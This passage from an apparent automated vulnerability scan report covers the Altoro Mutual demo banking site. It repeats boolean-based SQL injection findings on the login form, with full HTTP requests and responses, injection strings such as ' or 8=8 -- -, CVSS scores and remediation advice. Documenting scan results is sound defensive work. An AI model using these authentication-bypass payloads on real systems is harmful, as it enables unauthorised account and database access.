Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 213 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 214 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 215 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 216 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://65.61.137.117/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://65.61.137.117/doLogin HTTP/1.1
Origin: https://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:05:38 GMT
Connection: close
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 217 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:05:38 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 218 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 219 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 220 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 221 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 222 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 223 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 224 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 225 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 226 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 227 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117/doLogin HTTP/1.1
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:29:00 GMT
Connection: close
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 228 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:29:01 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 229 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 230 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 231 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 232 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 233 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 234 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 235 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 236 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 237 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 238 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6755
Date: Tue, 06 Aug 2019 04:34:43 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 239 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 240 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 241 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 242 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<p>
Welcome to Altoro Mutual Online.
</p>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 243 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 244 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 245 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
False Request: POST http://demo.testfire.net/doLogin HTTP/1.1
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:34:43 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 246 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 247 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 248 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 249 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 250 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 251 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 252 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 253 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 254 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 255 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6755
Date: Tue, 06 Aug 2019 04:28:56 GMT
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 256 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 257 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 258 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 259 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<p>
Welcome to Altoro Mutual Online.
</p>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 260 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 261 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 262 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
False Request: POST http://65.61.137.117/doLogin HTTP/1.1
Origin: http://65.61.137.117
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:28:57 GMT
Connection: close
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 263 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 264 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 265 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 266 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 267 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 268 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 269 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 270 of 1637
